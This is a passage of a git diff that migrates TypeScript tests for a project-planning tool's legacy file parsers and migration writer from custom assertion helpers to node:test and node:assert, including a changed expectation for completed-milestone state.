+    assert.deepStrictEqual(roadmap.phases[0].done, true, 'flat roadmap: first phase done');
+    assert.deepStrictEqual(roadmap.phases[1].done, false, 'flat roadmap: second phase not done');
+});
 
-  console.log('\n=== parseOldRoadmap: milestone-sectioned with <details> ===');
-  {
+test('parseOldRoadmap: milestone-sectioned with <details>', () => {
     const roadmap = parseOldRoadmap(SAMPLE_MILESTONE_SECTIONED_ROADMAP);
-    assertTrue(roadmap.milestones.length >= 2, 'ms roadmap: has milestone sections');
+    assert.ok(roadmap.milestones.length >= 2, 'ms roadmap: has milestone sections');
 
     const v20 = roadmap.milestones.find(m => m.id.includes('2.0'));
-    assertTrue(v20 !== undefined, 'ms roadmap: v2.0 found');
-    assertEq(v20?.collapsed, true, 'ms roadmap: v2.0 collapsed');
-    assertTrue((v20?.phases.length ?? 0) >= 2, 'ms roadmap: v2.0 has phases');
-    assertTrue(v20?.phases.every(p => p.done) ?? false, 'ms roadmap: v2.0 all done');
+    assert.ok(v20 !== undefined, 'ms roadmap: v2.0 found');
+    assert.deepStrictEqual(v20?.collapsed, true, 'ms roadmap: v2.0 collapsed');
+    assert.ok((v20?.phases.length ?? 0) >= 2, 'ms roadmap: v2.0 has phases');
+    assert.ok(v20?.phases.every(p => p.done) ?? false, 'ms roadmap: v2.0 all done');
 
     const v25 = roadmap.milestones.find(m => m.id.includes('2.5'));
-    assertTrue(v25 !== undefined, 'ms roadmap: v2.5 found');
-    assertEq(v25?.collapsed, false, 'ms roadmap: v2.5 not collapsed');
-    assertTrue((v25?.phases.length ?? 0) >= 3, 'ms roadmap: v2.5 has 3 phases');
+    assert.ok(v25 !== undefined, 'ms roadmap: v2.5 found');
+    assert.deepStrictEqual(v25?.collapsed, false, 'ms roadmap: v2.5 not collapsed');
+    assert.ok((v25?.phases.length ?? 0) >= 3, 'ms roadmap: v2.5 has 3 phases');
 
     const p29 = v25?.phases.find(p => p.number === 29);
-    assertEq(p29?.done, true, 'ms roadmap: phase 29 done');
+    assert.deepStrictEqual(p29?.done, true, 'ms roadmap: phase 29 done');
     const p30 = v25?.phases.find(p => p.number === 30);
-    assertEq(p30?.done, false, 'ms roadmap: phase 30 not done');
-  }
+    assert.deepStrictEqual(p30?.done, false, 'ms roadmap: phase 30 not done');
+});
 
   // ═══════════════════════════════════════════════════════════════════════
   // Plan Parser Tests
   // ═══════════════════════════════════════════════════════════════════════
 
-  console.log('\n=== parseOldPlan: XML-in-markdown ===');
-  {
+test('parseOldPlan: XML-in-markdown', () => {
     const plan = parseOldPlan(SAMPLE_PLAN_XML, '29-01-PLAN.md', '01');
-    assertTrue(plan.objective.includes('authentication'), 'plan: objective extracted');
-    assertEq(plan.tasks.length, 3, 'plan: 3 tasks');
-    assertTrue(plan.tasks[0].includes('auth middleware'), 'plan: first task content');
-    assertTrue(plan.context.includes('JWT'), 'plan: context extracted');
-    assertTrue(plan.verification.includes('Login returns'), 'plan: verification extracted');
-    assertTrue(plan.successCriteria.includes('endpoints respond'), 'plan: success criteria extracted');
+    assert.ok(plan.objective.includes('authentication'), 'plan: objective extracted');
+    assert.deepStrictEqual(plan.tasks.length, 3, 'plan: 3 tasks');
+    assert.ok(plan.tasks[0].includes('auth middleware'), 'plan: first task content');
+    assert.ok(plan.context.includes('JWT'), 'plan: context extracted');
+    assert.ok(plan.verification.includes('Login returns'), 'plan: verification extracted');
+    assert.ok(plan.successCriteria.includes('endpoints respond'), 'plan: success criteria extracted');
 
     // Frontmatter
-    assertEq(plan.frontmatter.phase, '29-auth-system', 'plan fm: phase');
-    assertEq(plan.frontmatter.plan, '01', 'plan fm: plan');
-    assertEq(plan.frontmatter.type, 'implementation', 'plan fm: type');
-    assertEq(plan.frontmatter.wave, 1, 'plan fm: wave');
-    assertEq(plan.frontmatter.autonomous, true, 'plan fm: autonomous');
-    assertTrue(plan.frontmatter.files_modified.length >= 2, 'plan fm: files_modified');
-    assertTrue(plan.frontmatter.must_haves !== null, 'plan fm: must_haves parsed');
-    assertTrue((plan.frontmatter.must_haves?.truths.length ?? 0) >= 1, 'plan fm: must_haves truths');
-    assertTrue((plan.frontmatter.must_haves?.artifacts.length ?? 0) >= 1, 'plan fm: must_haves artifacts');
-  }
+    assert.deepStrictEqual(plan.frontmatter.phase, '29-auth-system', 'plan fm: phase');
+    assert.deepStrictEqual(plan.frontmatter.plan, '01', 'plan fm: plan');
+    assert.deepStrictEqual(plan.frontmatter.type, 'implementation', 'plan fm: type');
+    assert.deepStrictEqual(plan.frontmatter.wave, 1, 'plan fm: wave');
+    assert.deepStrictEqual(plan.frontmatter.autonomous, true, 'plan fm: autonomous');
+    assert.ok(plan.frontmatter.files_modified.length >= 2, 'plan fm: files_modified');
+    assert.ok(plan.frontmatter.must_haves !== null, 'plan fm: must_haves parsed');
+    assert.ok((plan.frontmatter.must_haves?.truths.length ?? 0) >= 1, 'plan fm: must_haves truths');
+    assert.ok((plan.frontmatter.must_haves?.artifacts.length ?? 0) >= 1, 'plan fm: must_haves artifacts');
+});
 
-  console.log('\n=== parseOldPlan: plain markdown (no XML tags) ===');
-  {
+test('parseOldPlan: plain markdown (no XML tags)', () => {
     const plainPlan = `# 001: Fix Login Bug
 
 ## Description
@@ -315,100 +305,86 @@ Fix the login button not responding on mobile.
 2. Fix event propagation
 `;
     const plan = parseOldPlan(plainPlan, '001-PLAN.md', '001');
-    assertEq(plan.objective, '', 'plain plan: no objective (no XML)');
-    assertEq(plan.tasks.length, 0, 'plain plan: no tasks (no XML)');
-    assertEq(plan.frontmatter.phase, '', 'plain plan: no frontmatter phase');
-  }
+    assert.deepStrictEqual(plan.objective, '', 'plain plan: no objective (no XML)');
+    assert.deepStrictEqual(plan.tasks.length, 0, 'plain plan: no tasks (no XML)');
+    assert.deepStrictEqual(plan.frontmatter.phase, '', 'plain plan: no frontmatter phase');
+});
 
   // ═══════════════════════════════════════════════════════════════════════
   // Summary Parser Tests
   // ═══════════════════════════════════════════════════════════════════════
 
-  console.log('\n=== parseOldSummary: YAML frontmatter ===');
-  {
+test('parseOldSummary: YAML frontmatter', () => {
     const summary = parseOldSummary(SAMPLE_SUMMARY, '29-01-SUMMARY.md', '01');
-    assertEq(summary.frontmatter.phase, '29-auth-system', 'summary fm: phase');
-    assertEq(summary.frontmatter.plan, '01', 'summary fm: plan');
-    assertEq(summary.frontmatter.subsystem, 'auth', 'summary fm: subsystem');
-    assertEq(summary.frontmatter.tags, ['authentication', 'security'], 'summary fm: tags');
-    assertEq(summary.frontmatter.provides, ['auth-middleware', 'jwt-validation'], 'summary fm: provides');
-    assertEq(summary.frontmatter.affects, ['api-routes'], 'summary fm: affects');
-    assertEq(summary.frontmatter['tech-stack'], ['jsonwebtoken', 'express'], 'summary fm: tech-stack');
-    assertEq(summary.frontmatter['key-files'], ['src/auth.ts', 'src/middleware/auth.ts'], 'summary fm: key-files');
-    assertEq(summary.frontmatter['key-decisions'], ['Use RS256 for JWT signing', 'Store refresh tokens in DB'], 'summary fm: key-decisions');
-    assertEq(summary.frontmatter['patterns-established'], ['Middleware-based auth'], 'summary fm: patterns-established');
-    assertEq(summary.frontmatter.duration, '2h', 'summary fm: duration');
-    assertEq(summary.frontmatter.completed, '2026-01-15', 'summary fm: completed');
-    assertTrue(summary.body.includes('Auth Implementation Summary'), 'summary: body content present');
-  }
+    assert.deepStrictEqual(summary.frontmatter.phase, '29-auth-system', 'summary fm: phase');
+    assert.deepStrictEqual(summary.frontmatter.plan, '01', 'summary fm: plan');
+    assert.deepStrictEqual(summary.frontmatter.subsystem, 'auth', 'summary fm: subsystem');
+    assert.deepStrictEqual(summary.frontmatter.tags, ['authentication', 'security'], 'summary fm: tags');
+    assert.deepStrictEqual(summary.frontmatter.provides, ['auth-middleware', 'jwt-validation'], 'summary fm: provides');
+    assert.deepStrictEqual(summary.frontmatter.affects, ['api-routes'], 'summary fm: affects');
+    assert.deepStrictEqual(summary.frontmatter['tech-stack'], ['jsonwebtoken', 'express'], 'summary fm: tech-stack');
+    assert.deepStrictEqual(summary.frontmatter['key-files'], ['src/auth.ts', 'src/middleware/auth.ts'], 'summary fm: key-files');
+    assert.deepStrictEqual(summary.frontmatter['key-decisions'], ['Use RS256 for JWT signing', 'Store refresh tokens in DB'], 'summary fm: key-decisions');
+    assert.deepStrictEqual(summary.frontmatter['patterns-established'], ['Middleware-based auth'], 'summary fm: patterns-established');
+    assert.deepStrictEqual(summary.frontmatter.duration, '2h', 'summary fm: duration');
+    assert.deepStrictEqual(summary.frontmatter.completed, '2026-01-15', 'summary fm: completed');
+    assert.ok(summary.body.includes('Auth Implementation Summary'), 'summary: body content present');
+});
 
   // ═══════════════════════════════════════════════════════════════════════
   // Requirements Parser Tests
   // ═══════════════════════════════════════════════════════════════════════
 
-  console.log('\n=== parseOldRequirements ===');
-  {
+test('parseOldRequirements', () => {
     const reqs = parseOldRequirements(SAMPLE_REQUIREMENTS);
-    assertEq(reqs.length, 4, 'requirements: 4 entries');
-    assertEq(reqs[0].id, 'R001', 'req 0: id');
-    assertEq(reqs[0].title, 'User Authentication', 'req 0: title');
-    assertEq(reqs[0].status, 'active', 'req 0: status');
-    assertTrue(reqs[0].description.includes('log in'), 'req 0: description');
-    assertEq(reqs[2].id, 'R003', 'req 2: id');
-    assertEq(reqs[2].status, 'validated', 'req 2: status');
-    assertEq(reqs[3].id, 'R004', 'req 3: id');
-    assertEq(reqs[3].status, 'deferred', 'req 3: status');
-  }
+    assert.deepStrictEqual(reqs.length, 4, 'requirements: 4 entries');
+    assert.deepStrictEqual(reqs[0].id, 'R001', 'req 0: id');
+    assert.deepStrictEqual(reqs[0].title, 'User Authentication', 'req 0: title');
+    assert.deepStrictEqual(reqs[0].status, 'active', 'req 0: status');
+    assert.ok(reqs[0].description.includes('log in'), 'req 0: description');
+    assert.deepStrictEqual(reqs[2].id, 'R003', 'req 2: id');
+    assert.deepStrictEqual(reqs[2].status, 'validated', 'req 2: status');
+    assert.deepStrictEqual(reqs[3].id, 'R004', 'req 3: id');
+    assert.deepStrictEqual(reqs[3].status, 'deferred', 'req 3: status');
+});
 
   // ═══════════════════════════════════════════════════════════════════════
   // State Parser Tests
   // ═══════════════════════════════════════════════════════════════════════
 
-  console.log('\n=== parseOldState ===');
-  {
+test('parseOldState', () => {
     const state = parseOldState(SAMPLE_STATE);
-    assertTrue(state.currentPhase?.includes('30') ?? false, 'state: current phase includes 30');
-    assertEq(state.status, 'in-progress', 'state: status');
-    assertTrue(state.raw === SAMPLE_STATE, 'state: raw preserved');
-  }
+    assert.ok(state.currentPhase?.includes('30') ?? false, 'state: current phase includes 30');
+    assert.deepStrictEqual(state.status, 'in-progress', 'state: status');
+    assert.ok(state.raw === SAMPLE_STATE, 'state: raw preserved');
+});
 
   // ═══════════════════════════════════════════════════════════════════════
   // Config Parser Tests
   // ═══════════════════════════════════════════════════════════════════════
 
-  console.log('\n=== parseOldConfig: valid JSON ===');
-  {
+test('parseOldConfig: valid JSON', () => {
     const config = parseOldConfig('{"projectName":"test","version":"1.0"}');
-    assertTrue(config !== null, 'config: parsed');
-    assertEq(config?.projectName, 'test', 'config: projectName');
-  }
+    assert.ok(config !== null, 'config: parsed');
+    assert.deepStrictEqual(config?.projectName, 'test', 'config: projectName');
+});
 
-  console.log('\n=== parseOldConfig: invalid JSON → null ===');
-  {
+test('parseOldConfig: invalid JSON → null', () => {
     const config = parseOldConfig('not json at all {{{');
-    assertEq(config, null, 'config: invalid JSON returns null');
-  }
+    assert.deepStrictEqual(config, null, 'config: invalid JSON returns null');
+});
 
-  console.log('\n=== parseOldConfig: non-object JSON → null ===');
-  {
+test('parseOldConfig: non-object JSON → null', () => {
     const config = parseOldConfig('"just a string"');
-    assertEq(config, null, 'config: non-object returns null');
-  }
+    assert.deepStrictEqual(config, null, 'config: non-object returns null');
+});
 
   // ═══════════════════════════════════════════════════════════════════════
   // Project Parser Tests
   // ═══════════════════════════════════════════════════════════════════════
 
-  console.log('\n=== parseOldProject ===');
-  {
+test('parseOldProject', () => {
     const project = parseOldProject(SAMPLE_PROJECT);
-    assertEq(project, SAMPLE_PROJECT, 'project: returns raw content');
-  }
-
-  report();
-}
-
-main().catch((error) => {
-  console.error(error);
-  process.exit(1);
+    assert.deepStrictEqual(project, SAMPLE_PROJECT, 'project: returns raw content');
 });
+
diff --git a/src/resources/extensions/gsd/tests/migrate-writer-integration.test.ts b/src/resources/extensions/gsd/tests/migrate-writer-integration.test.ts
index fca6a533b..71be7d850 100644
--- a/src/resources/extensions/gsd/tests/migrate-writer-integration.test.ts
+++ b/src/resources/extensions/gsd/tests/migrate-writer-integration.test.ts
@@ -9,7 +9,8 @@ import { tmpdir } from 'node:os';
 
 import { writeGSDDirectory } from '../migrate/writer.ts';
 import { generatePreview } from '../migrate/preview.ts';
-import { parseRoadmap, parsePlan, parseSummary } from '../files.ts';
+import { parseRoadmap, parsePlan } from '../parsers-legacy.ts';
+import { parseSummary } from '../files.ts';
 import { deriveState } from '../state.ts';
 import { invalidateAllCaches } from '../cache.ts';
 import type {
@@ -19,9 +20,9 @@ import type {
   GSDTask,
   GSDRequirement,
 } from '../migrate/types.ts';
-import { createTestContext } from './test-helpers.ts';
+import { describe, test, beforeEach, afterEach } from 'node:test';
+import assert from 'node:assert/strict';
 
-const { assertEq, assertTrue, report } = createTestContext();
 // ─── Fixture Builders ──────────────────────────────────────────────────────
 
 function makeTask(id: string, title: string, done: boolean, hasSummary: boolean): GSDTask {
@@ -129,11 +130,9 @@ function buildCompleteProject(): GSDProject {
 // Tests
 // ═══════════════════════════════════════════════════════════════════════════
 
-async function main(): Promise<void> {
-
   // ─── Scenario 1: Incomplete project ────────────────────────────────────
-  console.log('\n=== Scenario 1: Incomplete project — write, parse, deriveState ===');
-  {
+
+test('Scenario 1: Incomplete project — write, parse, deriveState', async () => {
     const base = mkdtempSync(join(tmpdir(), 'gsd-writer-int-'));
     try {
       const project = buildIncompleteProject();
@@ -144,64 +143,64 @@ async function main(): Promise<void> {
       const gsd = join(base, '.gsd');
       const m = join(gsd, 'milestones', 'M001');
 
-      assertTrue(existsSync(join(m, 'M001-ROADMAP.md')), 'incomplete: M001-ROADMAP.md exists');
-      assertTrue(existsSync(join(m, 'M001-CONTEXT.md')), 'incomplete: M001-CONTEXT.md exists');
-      assertTrue(existsSync(join(m, 'M001-RESEARCH.md')), 'incomplete: M001-RESEARCH.md exists');
-      assertTrue(existsSync(join(m, 'slices', 'S01', 'S01-PLAN.md')), 'incomplete: S01-PLAN.md exists');
-      assertTrue(existsSync(join(m, 'slices', 'S02', 'S02-PLAN.md')), 'incomplete: S02-PLAN.md exists');
-      assertTrue(existsSync(join(m, 'slices', 'S01', 'S01-SUMMARY.md')), 'incomplete: S01-SUMMARY.md exists');
-      assertTrue(!existsSync(join(m, 'slices', 'S02', 'S02-SUMMARY.md')), 'incomplete: S02-SUMMARY.md NOT written (null)');
-      assertTrue(existsSync(join(gsd, 'REQUIREMENTS.md')), 'incomplete: REQUIREMENTS.md exists');
-      assertTrue(existsSync(join(gsd, 'PROJECT.md')), 'incomplete: PROJECT.md exists');
-      assertTrue(existsSync(join(gsd, 'DECISIONS.md')), 'incomplete: DECISIONS.md exists');
-      assertTrue(existsSync(join(gsd, 'STATE.md')), 'incomplete: STATE.md exists');
+      assert.ok(existsSync(join(m, 'M001-ROADMAP.md')), 'incomplete: M001-ROADMAP.md exists');
+      assert.ok(existsSync(join(m, 'M001-CONTEXT.md')), 'incomplete: M001-CONTEXT.md exists');
+      assert.ok(existsSync(join(m, 'M001-RESEARCH.md')), 'incomplete: M001-RESEARCH.md exists');
+      assert.ok(existsSync(join(m, 'slices', 'S01', 'S01-PLAN.md')), 'incomplete: S01-PLAN.md exists');
+      assert.ok(existsSync(join(m, 'slices', 'S02', 'S02-PLAN.md')), 'incomplete: S02-PLAN.md exists');
+      assert.ok(existsSync(join(m, 'slices', 'S01', 'S01-SUMMARY.md')), 'incomplete: S01-SUMMARY.md exists');
+      assert.ok(!existsSync(join(m, 'slices', 'S02', 'S02-SUMMARY.md')), 'incomplete: S02-SUMMARY.md NOT written (null)');
+      assert.ok(existsSync(join(gsd, 'REQUIREMENTS.md')), 'incomplete: REQUIREMENTS.md exists');
+      assert.ok(existsSync(join(gsd, 'PROJECT.md')), 'incomplete: PROJECT.md exists');
+      assert.ok(existsSync(join(gsd, 'DECISIONS.md')), 'incomplete: DECISIONS.md exists');
+      assert.ok(existsSync(join(gsd, 'STATE.md')), 'incomplete: STATE.md exists');
 
       // Task files
-      assertTrue(existsSync(join(m, 'slices', 'S01', 'tasks', 'T01-PLAN.md')), 'incomplete: T01-PLAN.md exists');
-      assertTrue(existsSync(join(m, 'slices', 'S01', 'tasks', 'T01-SUMMARY.md')), 'incomplete: T01-SUMMARY.md exists');
-      assertTrue(existsSync(join(m, 'slices', 'S01', 'tasks', 'T02-PLAN.md')), 'incomplete: T02-PLAN.md exists (auth task)');
-      assertTrue(existsSync(join(m, 'slices', 'S01', 'tasks', 'T02-SUMMARY.md')), 'incomplete: T02-SUMMARY.md exists (auth task)');
-      assertTrue(existsSync(join(m, 'slices', 'S02', 'tasks', 'T03-PLAN.md')), 'incomplete: T03-PLAN.md exists');
-      assertTrue(!existsSync(join(m, 'slices', 'S02', 'tasks', 'T03-SUMMARY.md')), 'incomplete: T03-SUMMARY.md NOT written (null)');
+      assert.ok(existsSync(join(m, 'slices', 'S01', 'tasks', 'T01-PLAN.md')), 'incomplete: T01-PLAN.md exists');
+      assert.ok(existsSync(join(m, 'slices', 'S01', 'tasks', 'T01-SUMMARY.md')), 'incomplete: T01-SUMMARY.md exists');
+      assert.ok(existsSync(join(m, 'slices', 'S01', 'tasks', 'T02-PLAN.md')), 'incomplete: T02-PLAN.md exists (auth task)');
+      assert.ok(existsSync(join(m, 'slices', 'S01', 'tasks', 'T02-SUMMARY.md')), 'incomplete: T02-SUMMARY.md exists (auth task)');
+      assert.ok(existsSync(join(m, 'slices', 'S02', 'tasks', 'T03-PLAN.md')), 'incomplete: T03-PLAN.md exists');
+      assert.ok(!existsSync(join(m, 'slices', 'S02', 'tasks', 'T03-SUMMARY.md')), 'incomplete: T03-SUMMARY.md NOT written (null)');
 
       // WrittenFiles counts
       console.log('  --- WrittenFiles counts ---');
-      assertEq(result.counts.roadmaps, 1, 'incomplete: WrittenFiles roadmaps count');
-      assertEq(result.counts.plans, 2, 'incomplete: WrittenFiles plans count');
-      assertEq(result.counts.taskPlans, 3, 'incomplete: WrittenFiles taskPlans count');
-      assertEq(result.counts.taskSummaries, 2, 'incomplete: WrittenFiles taskSummaries count');
-      assertEq(result.counts.sliceSummaries, 1, 'incomplete: WrittenFiles sliceSummaries count');
-      assertEq(result.counts.research, 1, 'incomplete: WrittenFiles research count');
-      assertEq(result.counts.requirements, 1, 'incomplete: WrittenFiles requirements count');
-      assertEq(result.counts.contexts, 1, 'incomplete: WrittenFiles contexts count');
+      assert.deepStrictEqual(result.counts.roadmaps, 1, 'incomplete: WrittenFiles roadmaps count');
+      assert.deepStrictEqual(result.counts.plans, 2, 'incomplete: WrittenFiles plans count');
+      assert.deepStrictEqual(result.counts.taskPlans, 3, 'incomplete: WrittenFiles taskPlans count');
+      assert.deepStrictEqual(result.counts.taskSummaries, 2, 'incomplete: WrittenFiles taskSummaries count');
+      assert.deepStrictEqual(result.counts.sliceSummaries, 1, 'incomplete: WrittenFiles sliceSummaries count');
+      assert.deepStrictEqual(result.counts.research, 1, 'incomplete: WrittenFiles research count');
+      assert.deepStrictEqual(result.counts.requirements, 1, 'incomplete: WrittenFiles requirements count');
+      assert.deepStrictEqual(result.counts.contexts, 1, 'incomplete: WrittenFiles contexts count');
 
       // (b) parseRoadmap on written roadmap
       console.log('  --- parseRoadmap ---');
       const roadmapContent = readFileSync(join(m, 'M001-ROADMAP.md'), 'utf-8');
       const roadmap = parseRoadmap(roadmapContent);
-      assertEq(roadmap.slices.length, 2, 'incomplete: roadmap has 2 slices');
-      assertTrue(roadmap.slices[0].done === true, 'incomplete: roadmap S01 is done');
-      assertTrue(roadmap.slices[1].done === false, 'incomplete: roadmap S02 is not done');
-      assertEq(roadmap.slices[0].id, 'S01', 'incomplete: roadmap slice 0 id');
-      assertEq(roadmap.slices[1].id, 'S02', 'incomplete: roadmap slice 1 id');
+      assert.deepStrictEqual(roadmap.slices.length, 2, 'incomplete: roadmap has 2 slices');
+      assert.ok(roadmap.slices[0].done === true, 'incomplete: roadmap S01 is done');
+      assert.ok(roadmap.slices[1].done === false, 'incomplete: roadmap S02 is not done');
+      assert.deepStrictEqual(roadmap.slices[0].id, 'S01', 'incomplete: roadmap slice 0 id');
+      assert.deepStrictEqual(roadmap.slices[1].id, 'S02', 'incomplete: roadmap slice 1 id');
 
       // (c) parsePlan on S01 plan
       console.log('  --- parsePlan S01 ---');
       const s01PlanContent = readFileSync(join(m, 'slices', 'S01', 'S01-PLAN.md'), 'utf-8');
       const s01Plan = parsePlan(s01PlanContent);
-      assertEq(s01Plan.tasks.length, 2, 'incomplete: S01 plan has 2 tasks');
-      assertTrue(s01Plan.tasks[0].done === true, 'incomplete: S01 T01 is done');
-      assertTrue(s01Plan.tasks[1].done === true, 'incomplete: S01 T02 is done');
+      assert.deepStrictEqual(s01Plan.tasks.length, 2, 'incomplete: S01 plan has 2 tasks');
+      assert.ok(s01Plan.tasks[0].done === true, 'incomplete: S01 T01 is done');
+      assert.ok(s01Plan.tasks[1].done === true, 'incomplete: S01 T02 is done');
 
       // (d) parseSummary on S01 summary
       console.log('  --- parseSummary S01 ---');
       const s01SummaryContent = readFileSync(join(m, 'slices', 'S01', 'S01-SUMMARY.md'), 'utf-8');
       const s01Summary = parseSummary(s01SummaryContent);
-      assertTrue(
+      assert.ok(
         (s01Summary.frontmatter.key_files as string[]).length > 0,
         'incomplete: S01 summary has key_files',
       );
-      assertTrue(
+      assert.ok(
         (s01Summary.frontmatter.provides as string[]).length > 0,
         'incomplete: S01 summary has provides',
       );
@@ -210,50 +209,50 @@ async function main(): Promise<void> {
       console.log('  --- deriveState ---');
       invalidateAllCaches();
       const state = await deriveState(base);
-      assertEq(state.phase, 'executing', 'incomplete: deriveState phase is executing');
-      assertTrue(state.activeMilestone !== null, 'incomplete: deriveState has activeMilestone');
-      assertEq(state.activeMilestone!.id, 'M001', 'incomplete: deriveState activeMilestone is M001');
-      assertTrue(state.activeSlice !== null, 'incomplete: deriveState has activeSlice');
-      assertEq(state.activeSlice!.id, 'S02', 'incomplete: deriveState activeSlice is S02');
-      assertTrue(state.activeTask !== null, 'incomplete: deriveState has activeTask');
-      assertEq(state.activeTask!.id, 'T03', 'incomplete: deriveState activeTask is T03');
-      assertTrue(state.progress!.slices !== undefined, 'incomplete: deriveState has slices progress');
-      assertEq(state.progress!.slices!.done, 1, 'incomplete: deriveState slices done count');
-      assertEq(state.progress!.slices!.total, 2, 'incomplete: deriveState slices total count');
-      assertTrue(state.progress!.tasks !== undefined, 'incomplete: deriveState has tasks progress');
+      assert.deepStrictEqual(state.phase, 'executing', 'incomplete: deriveState phase is executing');
+      assert.ok(state.activeMilestone !== null, 'incomplete: deriveState has activeMilestone');
+      assert.deepStrictEqual(state.activeMilestone!.id, 'M001', 'incomplete: deriveState activeMilestone is M001');
+      assert.ok(state.activeSlice !== null, 'incomplete: deriveState has activeSlice');
+      assert.deepStrictEqual(state.activeSlice!.id, 'S02', 'incomplete: deriveState activeSlice is S02');
+      assert.ok(state.activeTask !== null, 'incomplete: deriveState has activeTask');
+      assert.deepStrictEqual(state.activeTask!.id, 'T03', 'incomplete: deriveState activeTask is T03');
+      assert.ok(state.progress!.slices !== undefined, 'incomplete: deriveState has slices progress');
+      assert.deepStrictEqual(state.progress!.slices!.done, 1, 'incomplete: deriveState slices done count');
+      assert.deepStrictEqual(state.progress!.slices!.total, 2, 'incomplete: deriveState slices total count');
+      assert.ok(state.progress!.tasks !== undefined, 'incomplete: deriveState has tasks progress');
       // S02 has 1 task, 0 done (only active slice tasks counted)
-      assertEq(state.progress!.tasks!.done, 0, 'incomplete: deriveState tasks done (in active slice)');
-      assertEq(state.progress!.tasks!.total, 1, 'incomplete: deriveState tasks total (in active slice)');
+      assert.deepStrictEqual(state.progress!.tasks!.done, 0, 'incomplete: deriveState tasks done (in active slice)');
+      assert.deepStrictEqual(state.progress!.tasks!.total, 1, 'incomplete: deriveState tasks total (in active slice)');
       // Requirements
-      assertEq(state.requirements!.active, 1, 'incomplete: deriveState requirements active');
-      assertEq(state.requirements!.validated, 1, 'incomplete: deriveState requirements validated');
-      assertEq(state.requirements!.deferred, 1, 'incomplete: deriveState requirements deferred');
-      assertEq(state.requirements!.outOfScope, 1, 'incomplete: deriveState requirements outOfScope');
+      assert.deepStrictEqual(state.requirements!.active, 1, 'incomplete: deriveState requirements active');
+      assert.deepStrictEqual(state.requirements!.validated, 1, 'incomplete: deriveState requirements validated');
+      assert.deepStrictEqual(state.requirements!.deferred, 1, 'incomplete: deriveState requirements deferred');
+      assert.deepStrictEqual(state.requirements!.outOfScope, 1, 'incomplete: deriveState requirements outOfScope');
 
       // (f) generatePreview
       console.log('  --- generatePreview ---');
       const preview = generatePreview(project);
-      assertEq(preview.milestoneCount, 1, 'incomplete: preview milestoneCount');
-      assertEq(preview.totalSlices, 2, 'incomplete: preview totalSlices');
-      assertEq(preview.totalTasks, 3, 'incomplete: preview totalTasks');
-      assertEq(preview.doneSlices, 1, 'incomplete: preview doneSlices');
-      assertEq(preview.doneTasks, 2, 'incomplete: preview doneTasks');
-      assertEq(preview.sliceCompletionPct, 50, 'incomplete: preview sliceCompletionPct');
-      assertEq(preview.taskCompletionPct, 67, 'incomplete: preview taskCompletionPct');
-      assertEq(preview.requirements.active, 1, 'incomplete: preview requirements active');
-      assertEq(preview.requirements.validated, 1, 'incomplete: preview requirements validated');
-      assertEq(preview.requirements.deferred, 1, 'incomplete: preview requirements deferred');
-      assertEq(preview.requirements.outOfScope, 1, 'incomplete: preview requirements outOfScope');
-      assertEq(preview.requirements.total, 4, 'incomplete: preview requirements total');
+      assert.deepStrictEqual(preview.milestoneCount, 1, 'incomplete: preview milestoneCount');
+      assert.deepStrictEqual(preview.totalSlices, 2, 'incomplete: preview totalSlices');
+      assert.deepStrictEqual(preview.totalTasks, 3, 'incomplete: preview totalTasks');
+      assert.deepStrictEqual(preview.doneSlices, 1, 'incomplete: preview doneSlices');
+      assert.deepStrictEqual(preview.doneTasks, 2, 'incomplete: preview doneTasks');
+      assert.deepStrictEqual(preview.sliceCompletionPct, 50, 'incomplete: preview sliceCompletionPct');
+      assert.deepStrictEqual(preview.taskCompletionPct, 67, 'incomplete: preview taskCompletionPct');
+      assert.deepStrictEqual(preview.requirements.active, 1, 'incomplete: preview requirements active');
+      assert.deepStrictEqual(preview.requirements.validated, 1, 'incomplete: preview requirements validated');
+      assert.deepStrictEqual(preview.requirements.deferred, 1, 'incomplete: preview requirements deferred');
+      assert.deepStrictEqual(preview.requirements.outOfScope, 1, 'incomplete: preview requirements outOfScope');
+      assert.deepStrictEqual(preview.requirements.total, 4, 'incomplete: preview requirements total');
 
     } finally {
       rmSync(base, { recursive: true, force: true });
     }
-  }
+});
 
   // ─── Scenario 2: Fully complete project ────────────────────────────────
-  console.log('\n=== Scenario 2: Fully complete project — deriveState phase ===');
-  {
+
+test('Scenario 2: Fully complete project — deriveState phase', async () => {
     const base = mkdtempSync(join(tmpdir(), 'gsd-writer-int-complete-'));
     try {
       const project = buildCompleteProject();
@@ -261,43 +260,35 @@ async function main(): Promise<void> {
 
       // Null research should NOT produce a file
       const m = join(base, '.gsd', 'milestones', 'M001');
-      assertTrue(!existsSync(join(m, 'M001-RESEARCH.md')), 'complete: M001-RESEARCH.md NOT written (null)');
+      assert.ok(!existsSync(join(m, 'M001-RESEARCH.md')), 'complete: M001-RESEARCH.md NOT written (null)');
       // No REQUIREMENTS.md since empty requirements
-      assertTrue(!existsSync(join(base, '.gsd', 'REQUIREMENTS.md')), 'complete: REQUIREMENTS.md NOT written (empty)');
+      assert.ok(!existsSync(join(base, '.gsd', 'REQUIREMENTS.md')), 'complete: REQUIREMENTS.md NOT written (empty)');
       // Completed milestone should have VALIDATION and SUMMARY from migration (#819)
-      assertTrue(existsSync(join(m, 'M001-VALIDATION.md')), 'complete: M001-VALIDATION.md written for completed milestone');
-      assertTrue(existsSync(join(m, 'M001-SUMMARY.md')), 'complete: M001-SUMMARY.md written for completed milestone');
+      assert.ok(existsSync(join(m, 'M001-VALIDATION.md')), 'complete: M001-VALIDATION.md written for completed milestone');
+      assert.ok(existsSync(join(m, 'M001-SUMMARY.md')), 'complete: M001-SUMMARY.md written for completed milestone');
 
       // deriveState: all slices done, all tasks done — migration now writes
       // VALIDATION.md and SUMMARY.md for completed milestones (#819),
       // so the milestone should be fully complete.
       invalidateAllCaches();
       const state = await deriveState(base);
-      assertEq(state.phase, 'complete', 'complete: deriveState phase is complete (validation + summary written by migration)');
-      // When all milestones are complete, activeMilestone points to the last entry (for display)
-      assertTrue(state.activeMilestone !== null, 'complete: deriveState has activeMilestone (last entry)');
-      assertEq(state.activeMilestone!.id, 'M001', 'complete: deriveState activeMilestone is M001');
+      assert.deepStrictEqual(state.phase, 'complete', 'complete: deriveState phase is complete (validation + summary written by migration)');
+      assert.equal(state.activeMilestone, null, 'complete: deriveState has no activeMilestone');
+      assert.ok(state.lastCompletedMilestone !== null, 'complete: deriveState exposes lastCompletedMilestone');
+      assert.deepStrictEqual(state.lastCompletedMilestone!.id, 'M001', 'complete: deriveState lastCompletedMilestone is M001');
 
       // generatePreview for complete project
       const preview = generatePreview(project);
-      assertEq(preview.milestoneCount, 1, 'complete: preview milestoneCount');
